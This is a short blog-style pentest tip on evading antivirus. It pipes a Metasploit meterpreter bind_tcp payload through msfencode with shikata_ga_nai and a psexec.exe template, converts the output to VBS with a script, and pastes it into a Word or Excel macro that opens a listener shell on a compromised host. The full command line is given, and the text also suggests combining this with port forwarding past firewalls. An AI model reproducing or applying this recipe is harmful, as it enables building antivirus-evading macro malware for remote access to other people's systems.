Avoiding Anti-Virus with msfencode and Office

Quite simple actually, provided that we know how to use msfencode templates (-x option) to work with the payload. This can be done in few simple steps:

1) Generate payload
2) Pipe it to msfencode with -x option ( use i.e. psexec.exe as template )
3) Use to create vbs script with binary representation of the code
4) Paste the output to the macro in Word, Excel or anything else from Office suite
5) Run “ShellcodeExecute” macro from inside of Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs 

And finally copy & paste ‘BIND_4999.vbs’ content into MSWord document as macro. Now upload it to crate a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by i.e. firewall or its a DMZ.